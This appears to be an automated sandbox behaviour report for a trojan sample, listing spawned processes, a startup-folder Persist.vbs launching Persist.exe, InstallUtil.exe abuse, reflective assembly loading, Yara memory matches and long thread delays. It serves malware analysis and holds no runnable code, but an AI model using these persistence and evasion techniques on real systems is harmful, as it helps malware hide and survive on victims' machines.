Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Persist.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Persist.exe "C:\Users\user\AppData\Roaming\Persist.exe"
Source: C:\Users\user\AppData\Roaming\Persist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Persist.exe "C:\Users\user\AppData\Roaming\Persist.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior

Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, JSONParser.cs	.Net Code: ParseValue
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, Crfwy.cs	.Net Code: Tnnnzaizfe System.Reflection.Assembly.Load(byte[])
Source: Persist.exe.0.dr, JSONParser.cs	.Net Code: ParseValue
Source: Persist.exe.0.dr, Crfwy.cs	.Net Code: Tnnnzaizfe System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.4443e10.2.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.4443e10.2.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.4443e10.2.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.4443e10.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.4443e10.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5bd0000.11.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5bd0000.11.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5bd0000.11.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5bd0000.11.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5bd0000.11.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Source: Yara match	File source: 4.2.Persist.exe.3e455d0.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5b70000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.4345dd8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.4305db8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5b70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.4345dd8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.42e5d98.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.43c55d0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.43c55d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1459309358.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1461544019.0000000005B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1696484809.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1459309358.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe PID: 8632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Persist.exe PID: 9000, type: MEMORYSTR

Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Static PE information: section name: .text entropy: 7.994617077835679
Source: Persist.exe.0.dr	Static PE information: section name: .text entropy: 7.994617077835679

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Memory allocated: 1670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Memory allocated: 32E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Memory allocated: 1670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 23A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 43A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Memory allocated: 1300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Persist.exe	Memory allocated: 4D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 13D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4D30000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599032	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598024	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597319	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596326	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595375	Jump to behavior
